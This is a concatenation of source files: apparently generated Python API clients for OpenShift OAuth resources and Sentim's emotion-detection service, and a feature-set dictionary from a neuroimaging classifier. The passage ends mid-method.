        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method replace_oauth_openshift_io_v1_o_auth_authorize_token" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `replace_oauth_openshift_io_v1_o_auth_authorize_token`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `replace_oauth_openshift_io_v1_o_auth_authorize_token`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PUT',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthAuthorizeToken',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def replace_oauth_openshift_io_v1_o_auth_client(self, name, body, **kwargs):
        """
        replace the specified OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.replace_oauth_openshift_io_v1_o_auth_client(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClient (required)
        :param V1OAuthClient body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthClient
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.replace_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
        else:
            (data) = self.replace_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
            return data

    def replace_oauth_openshift_io_v1_o_auth_client_with_http_info(self, name, body, **kwargs):
        """
        replace the specified OAuthClient
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.replace_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClient (required)
        :param V1OAuthClient body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthClient
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method replace_oauth_openshift_io_v1_o_auth_client" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `replace_oauth_openshift_io_v1_o_auth_client`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `replace_oauth_openshift_io_v1_o_auth_client`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthclients/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PUT',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthClient',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def replace_oauth_openshift_io_v1_o_auth_client_authorization(self, name, body, **kwargs):
        """
        replace the specified OAuthClientAuthorization
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.replace_oauth_openshift_io_v1_o_auth_client_authorization(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClientAuthorization (required)
        :param V1OAuthClientAuthorization body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthClientAuthorization
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.replace_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
        else:
            (data) = self.replace_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
            return data

    def replace_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, name, body, **kwargs):
        """
        replace the specified OAuthClientAuthorization
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.replace_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the OAuthClientAuthorization (required)
        :param V1OAuthClientAuthorization body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1OAuthClientAuthorization
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method replace_oauth_openshift_io_v1_o_auth_client_authorization" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `replace_oauth_openshift_io_v1_o_auth_client_authorization`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `replace_oauth_openshift_io_v1_o_auth_client_authorization`")

        collection_formats = {}

        resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PUT',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1OAuthClientAuthorization',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
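Every generated method above begins with the same allow-list check on `**kwargs` before dispatching the HTTP call. A minimal standalone sketch of that validation pattern (the function name is illustrative, not part of the generated client):

```python
def validate_kwargs(method_name, all_params, kwargs):
    """Reject keyword arguments missing from the method's allow-list,
    mirroring the TypeError raised by the generated client methods."""
    for key in kwargs:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method %s" % (key, method_name)
            )
    return dict(kwargs)
```

Each `_with_http_info` method inlines this same loop over `iteritems(params['kwargs'])`, then merges the accepted keys into `params`.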
# Source: MELDProject/meld_classifier, meld_classifier/set_basic.py (MIT license)
## definitions of different feature sets for experiments
exclude_set = {
    1: [
        ".combat.on_lh.thickness.sm10.mgh",
        ".combat.on_lh.w-g.pct.sm10.mgh",
        ".combat.on_lh.wm_FLAIR_0.5.sm10.mgh",
        ".combat.on_lh.wm_FLAIR_1.sm10.mgh",
        ".combat.on_lh.curv.mgh",
        ".combat.on_lh.gm_FLAIR_0.25.sm10.mgh",
        ".combat.on_lh.gm_FLAIR_0.5.sm10.mgh",
        ".combat.on_lh.gm_FLAIR_0.75.sm10.mgh",
        ".combat.on_lh.gm_FLAIR_0.sm10.mgh",
        ".combat.on_lh.pial.K_filtered.sm20.mgh",
    ],
    2: [
        ".combat.on_lh.thickness.sm10.mgh",
        ".combat.on_lh.w-g.pct.sm10.mgh",
        ".combat.on_lh.wm_FLAIR_0.5.sm10.mgh",
        ".combat.on_lh.wm_FLAIR_1.sm10.mgh",
        ".combat.on_lh.curv.mgh",
        ".combat.on_lh.gm_FLAIR_0.25.sm10.mgh",
        ".combat.on_lh.gm_FLAIR_0.5.sm10.mgh",
        ".combat.on_lh.gm_FLAIR_0.75.sm10.mgh",
        ".combat.on_lh.gm_FLAIR_0.sm10.mgh",
        ".combat.on_lh.pial.K_filtered.sm20.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.curv.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.sulc.mgh",
        ".inter_z.intra_z.combat.on_lh.curv.mgh",
        ".inter_z.intra_z.combat.on_lh.sulc.mgh",
    ],
    3: [],
    4: [
        ".inter_z.asym.intra_z.combat.on_lh.curv.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.gm_FLAIR_0.25.sm10.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.gm_FLAIR_0.5.sm10.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.gm_FLAIR_0.75.sm10.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.gm_FLAIR_0.sm10.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.pial.K_filtered.sm20.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.sulc.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.thickness.sm10.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.w-g.pct.sm10.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.wm_FLAIR_0.5.sm10.mgh",
        ".inter_z.asym.intra_z.combat.on_lh.wm_FLAIR_1.sm10.mgh",
        ".inter_z.intra_z.combat.on_lh.curv.mgh",
        ".inter_z.intra_z.combat.on_lh.gm_FLAIR_0.25.sm10.mgh",
        ".inter_z.intra_z.combat.on_lh.gm_FLAIR_0.5.sm10.mgh",
        ".inter_z.intra_z.combat.on_lh.gm_FLAIR_0.75.sm10.mgh",
        ".inter_z.intra_z.combat.on_lh.gm_FLAIR_0.sm10.mgh",
        ".inter_z.intra_z.combat.on_lh.pial.K_filtered.sm20.mgh",
        ".inter_z.intra_z.combat.on_lh.sulc.mgh",
        ".inter_z.intra_z.combat.on_lh.thickness.sm10.mgh",
        ".inter_z.intra_z.combat.on_lh.w-g.pct.sm10.mgh",
        ".inter_z.intra_z.combat.on_lh.wm_FLAIR_0.5.sm10.mgh",
        ".inter_z.intra_z.combat.on_lh.wm_FLAIR_1.sm10.mgh",
    ],
}
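An exclude set is subtracted from the full feature list when assembling an experiment. A minimal sketch of that selection step, assuming the same `exclude_set` layout as above (the trimmed-down dictionary, feature names, and helper name here are illustrative):

```python
# Illustrative stand-in for the real exclude_set dictionary above.
exclude_set = {
    1: [".combat.on_lh.thickness.sm10.mgh"],
    3: [],
}

def select_features(features, experiment_id):
    """Return the features kept for an experiment after applying its exclude set."""
    excluded = set(exclude_set[experiment_id])
    return [f for f in features if f not in excluded]
```

Experiment 3 has an empty exclude set, so it keeps every feature; the other experiments drop their listed entries.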
# Source: Sentim-LLC/sentim_client, sentim/api/default_api.py (Apache-2.0 license)
# coding: utf-8
"""
Sentim's Emotion APIs
An emotion recognition api that tells you the emotion of text, and not just the connotation. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: help@sentimllc.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sentim.api_client import ApiClient
from sentim.exceptions import (
ApiTypeError,
ApiValueError
)
class DefaultApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def detect_batch_emotion(self, batch_text, **kwargs): # noqa: E501
"""Detect the emotion of a list of strings # noqa: E501
Given a list of strings and the language of all strings, this method produces the emotion scores for each input string. Note: This method assumes that all of the strings are unrelated to each other, i.e. this method does not use context. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_batch_emotion(batch_text, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param BatchText batch_text: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: BatchEmotionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.detect_batch_emotion_with_http_info(batch_text, **kwargs) # noqa: E501
def detect_batch_emotion_with_http_info(self, batch_text, **kwargs): # noqa: E501
"""Detect the emotion of a list of strings # noqa: E501
Given a list of strings and the language of all strings, this method produces the emotion scores for each input string. Note: This method assumes that all of the strings are unrelated to each other, i.e. this method does not use context. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_batch_emotion_with_http_info(batch_text, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param BatchText batch_text: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(BatchEmotionResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['batch_text'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method detect_batch_emotion" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'batch_text' is set
if ('batch_text' not in local_var_params or
local_var_params['batch_text'] is None):
raise ApiValueError("Missing the required parameter `batch_text` when calling `detect_batch_emotion`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'batch_text' in local_var_params:
body_params = local_var_params['batch_text']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/emotion/batch', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BatchEmotionResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
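The `async_req` flag documented above makes a generated method hand the work to a thread pool and return a result object whose `.get()` blocks for the value. A standalone sketch of that sync-or-async dispatch, using `multiprocessing.pool.ThreadPool` directly rather than the client's own `ApiClient` pool (the `call` helper is illustrative):

```python
from multiprocessing.pool import ThreadPool

_pool = ThreadPool(1)

def call(func, *args, async_req=False, **kwargs):
    """Run func synchronously, or submit it to the pool and return the
    AsyncResult (whose .get() blocks for the value) when async_req is True."""
    if async_req:
        return _pool.apply_async(func, args, kwargs)
    return func(*args, **kwargs)
```

With `async_req=False` the caller gets the value immediately; with `async_req=True` the caller gets a handle and fetches the value later with `.get()`, matching the `thread = api.detect_batch_emotion(..., async_req=True); result = thread.get()` pattern in the docstrings.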
def detect_emotion(self, conversation, **kwargs): # noqa: E501
"""Detect emotion of a conversation # noqa: E501
Given a conversation and the language of that conversation, this method classifies the emotion expressed for the last message of the input conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_emotion(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: A conversation of length 1-5 turns. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: EmotionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.detect_emotion_with_http_info(conversation, **kwargs) # noqa: E501
def detect_emotion_with_http_info(self, conversation, **kwargs): # noqa: E501
"""Detect emotion of a conversation # noqa: E501
Given a conversation and the language of that conversation, this method classifies the emotion expressed for the last message of the input conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_emotion_with_http_info(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: A conversation of length 1-5 turns. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(EmotionResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['conversation'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method detect_emotion" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'conversation' is set
if ('conversation' not in local_var_params or
local_var_params['conversation'] is None):
raise ApiValueError("Missing the required parameter `conversation` when calling `detect_emotion`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation' in local_var_params:
body_params = local_var_params['conversation']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/emotion/single', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmotionResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def detect_emotion_conversation(self, conversation, **kwargs): # noqa: E501
"""Detect the emotion of every user message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, classify the emotion the user is expressing for every user message in the conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_emotion_conversation(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: BatchEmotionResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.detect_emotion_conversation_with_http_info(conversation, **kwargs) # noqa: E501
def detect_emotion_conversation_with_http_info(self, conversation, **kwargs): # noqa: E501
"""Detect the emotion of every user message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, classify the emotion the user is expressing for every user message in the conversation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.detect_emotion_conversation_with_http_info(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(BatchEmotionResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['conversation'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method detect_emotion_conversation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'conversation' is set
if ('conversation' not in local_var_params or
local_var_params['conversation'] is None):
raise ApiValueError("Missing the required parameter `conversation` when calling `detect_emotion_conversation`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'conversation' in local_var_params:
body_params = local_var_params['conversation']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['sentim_auth'] # noqa: E501
return self.api_client.call_api(
'/emotion/conversation', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BatchEmotionResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_access_token(self, client_id, client_secret, **kwargs): # noqa: E501
"""Oauth 2.0 authentication handler # noqa: E501
Given your client id and secret (generated from the user settings page), generates the access token needed to authenticate with the rest of the api. Note: access tokens will eventually expire, so you will need to call this method periodically to get a new one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_access_token(client_id, client_secret, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str client_id: Your client id (required)
:param str client_secret: Your client secret (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_access_token_with_http_info(client_id, client_secret, **kwargs) # noqa: E501
def get_access_token_with_http_info(self, client_id, client_secret, **kwargs): # noqa: E501
"""Oauth 2.0 authentication handler # noqa: E501
Given your client id and secret (generated from the user settings page), generates the access token needed to authenticate with the rest of the api. Note: access tokens will eventually expire, so you will need to call this method periodically to get a new one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_access_token_with_http_info(client_id, client_secret, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str client_id: Your client id (required)
:param str client_secret: Your client secret (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['client_id', 'client_secret'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_access_token" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in local_var_params or
local_var_params['client_id'] is None):
raise ApiValueError("Missing the required parameter `client_id` when calling `get_access_token`") # noqa: E501
# verify the required parameter 'client_secret' is set
if ('client_secret' not in local_var_params or
local_var_params['client_secret'] is None):
raise ApiValueError("Missing the required parameter `client_secret` when calling `get_access_token`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'client_id' in local_var_params:
query_params.append(('client_id', local_var_params['client_id'])) # noqa: E501
if 'client_secret' in local_var_params:
query_params.append(('client_secret', local_var_params['client_secret'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/token', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
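# Usage sketch (illustrative only; the configuration attribute shown is an
# assumption based on typical OpenAPI-generated clients, not confirmed by this
# file): because access tokens expire, callers typically fetch a fresh token
# and store it on the client configuration before calling other endpoints.
#
#     token = api.get_access_token('my_client_id', 'my_client_secret')
#     api.api_client.configuration.access_token = token  # hypothetical attribute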
def score_chatbot_conversation(self, conversation, **kwargs): # noqa: E501
"""Score the effectiveness of every chatbot message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, where the user is the first and last to talk, score every chatbot message based on whether or not the user's emotion matches what we expect. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.score_chatbot_conversation(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ConversationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.score_chatbot_conversation_with_http_info(conversation, **kwargs) # noqa: E501
def score_chatbot_conversation_with_http_info(self, conversation, **kwargs): # noqa: E501
"""Score the effectiveness of every chatbot message in a conversation # noqa: E501
Given a conversation of user-chatbot speech, where the user is the first and last to talk, score every chatbot message based on whether or not the user's emotion matches what we expect. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.score_chatbot_conversation_with_http_info(conversation, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param Conversation conversation: (required)
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ConversationResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['conversation'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method score_chatbot_conversation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'conversation' is set
if ('conversation' not in local_var_params or
local_var_params['conversation'] is None):
